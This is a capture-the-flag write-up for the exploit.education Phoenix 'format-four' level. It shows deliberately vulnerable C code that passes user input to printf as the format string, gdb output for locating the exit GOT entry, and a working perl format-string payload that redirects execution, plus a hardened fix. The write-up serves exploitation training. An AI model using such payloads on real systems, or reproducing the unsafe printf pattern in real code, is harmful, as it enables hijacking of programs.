1. intro
2. Code and analysis
2.1. C code
    /*
     * phoenix/format-four, by https://exploit.education
     *
     * Can you affect code execution? Once you've got congratulations() to
     * execute, can you then execute your own shell code?
     *
     * Did you get a hair cut?
     * No, I got all of them cut.
     *
     */

    #include <err.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define BANNER \
      "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

    void bounce(char *str) {
      printf(str);   /* user input is passed directly as the format string */
      exit(0);       /* exit() is resolved through the GOT on this call */
    }

    void congratulations() {
      printf("Well done, you're redirected code execution!\n");
      exit(0);
    }

    int main(int argc, char **argv) {
      char buf[4096];

      printf("%s\n", BANNER);

      if (read(0, buf, sizeof(buf) - 1) <= 0) {
        exit(EXIT_FAILURE);
      }

      bounce(buf);
    }
2.2. Analysis
This is similar to the previous level, but this time there is a congratulations() function, and the goal is to get it to execute.
3. Confirming the vulnerability and preparing the attack
3.1. Vulnerability
The printf call inside bounce(): user input is used directly as the format string, i.e. a format string vulnerability.
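The vulnerable bounce() beside its hardened form, as an added example (not code from this page or from exploit.education), with a check showing that the fix leaves "%p"/"%hn" in user input uninterpreted. The helper names and the probe string are my own.

```c
#include <stdio.h>
#include <string.h>

/* The shape of the bug: user data is the format string, so any %p, %n or
 * %hn it contains is interpreted by printf. (gcc -Wformat-security flags
 * this call.) */
void bounce_vulnerable(char *str) {
    printf(str);
}

/* The fix: user data is only ever an argument to a constant format string
 * (fputs(str, stdout) is equivalent), so '%' in it has no meaning. */
void bounce_fixed(const char *str) {
    printf("%s", str);
}

/* Checkable version of the fixed pattern: render through "%s" into a buffer
 * and report whether the input came out byte-for-byte unchanged (1 = yes). */
int fixed_echo_is_inert(const char *str) {
    char out[256];
    int n = snprintf(out, sizeof out, "%s", str);
    return n >= 0 && (size_t)n < sizeof out && strcmp(out, str) == 0;
}

/* Checkable version of the vulnerable pattern. Only "%%" is passed to it in
 * the check, because "%p" or "%hn" with no matching argument is undefined
 * behaviour; "%%" is enough to show that the directive is consumed. */
int vulnerable_echo_is_inert(const char *str) {
    char out[256];
    int n = snprintf(out, sizeof out, str);   /* user-controlled format */
    return n >= 0 && (size_t)n < sizeof out && strcmp(out, str) == 0;
}

int main(void) {
    /* Constructed probe modelled on the writeup's "%p...%hn" input. */
    const char *probe = "AAAAAAAA%p%p%p%p%hn";
    printf("fixed bounce leaves probe unchanged: %s\n",
           fixed_echo_is_inert(probe) ? "yes" : "no");
    printf("vulnerable bounce leaves \"100%%%%\" unchanged: %s\n",
           vulnerable_echo_is_inert("100%%") ? "yes" : "no");
    return 0;
}
```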
3.2. Attack preparation
As before, a specific value has to be written to a specific location.
In this level the location is the GOT entry of exit (exit@got.plt), because exit() is called at the end of bounce(),
and the value is the address of congratulations().
The two addresses are as follows:
0x6009f0 <exit@got.plt>: 0x00007ffff7d8163f 0x00007ffff7d8fd2c
gef> p congratulations
$4 = {<text variable, no debug info>} 0x400644 <congratulations>
The offset was checked roughly as follows:
gef> r
Starting program: /opt/phoenix/amd64/format-four
Welcome to phoenix/format-four, brought to you by https://exploit.education
AAAAAAAA%p%p%p%p%p%p%p%p%p%p%p%p
AAAAAAAA0x7ffff7ffdc0c0x7ffff7ffb3000x7ffff7dc26170000x7fffffffd6800x7fffffffe6800x4006b50x7fffffffe6d80x1000000000x4141414141414141
Now the trial-and-error work begins.
4. Exploit
Adjust the offsets and values one at a time until they line up.
user@phoenix-amd64:~$ (perl -e 'print "%1332c" , "%p"x20 , "%hn" , "%195068c" , "%hn" , "%131008c" , "%hn" ,"AAAAAAAAA", "\xf0\x09\x60\x00\x00\x00\x00\x00" , "BBBBBBBB" , "\xf2\x09\x60\x00\x00\x00\x00\x00" ,"CCCCCCCC", "\xf4\x09\x60\x00\x00\x00\x00\x00"') | /opt/phoenix/amd64/format-four
...
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!